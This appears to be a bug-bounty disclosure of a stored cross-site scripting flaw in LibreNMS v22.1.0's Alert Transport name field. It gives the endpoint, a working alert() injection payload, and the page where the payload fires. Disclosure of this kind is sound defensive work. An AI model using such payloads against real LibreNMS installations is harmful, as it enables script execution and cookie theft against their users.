Cross-site Scripting (XSS) - Generic in librenms/librenms
Valid
Reported on
Feb 12th 2022
Description
Cross-Site Scripting vulnerability in LibreNMS v22.1.0 which allows attackers to execute arbitrary javascript code which affected Alerts module (Alert Transport) in Transport name field.
Proof of Concept
Endpoint:
1 POST http://{HOST}/ajax_form.php - Parameter name
~
Payload:
'><body onload=alert("TName")>
~
XSS will fire-up by user visiting:
1 http://{HOST}/alert-transports
~
PoC images:
1 payload
Impact
This vulnerability is capable of running malicious javascript code on web pages, stealing a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
Occurrences
We are processing your report and will contact the
librenms
team within 24 hours.
a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
alert-transports.inc.php#L38
has been validated
to join this conversation